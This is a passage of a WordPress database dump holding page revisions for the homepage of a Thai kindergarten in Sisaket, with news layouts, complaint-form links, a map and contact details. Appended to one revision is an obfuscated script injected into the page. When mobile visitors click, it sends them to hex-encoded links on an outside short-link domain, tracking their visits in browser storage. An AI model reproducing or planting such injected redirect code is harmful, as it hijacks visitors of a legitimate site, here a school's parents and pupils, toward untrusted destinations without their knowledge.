data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 14:09:03','2024-08-30 07:09:03','',19,'http://watprato.ssk.in.th/?p=341',0,'revision','',0),
(342,2,'2024-08-30 14:11:51','2024-08-30 07:11:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn 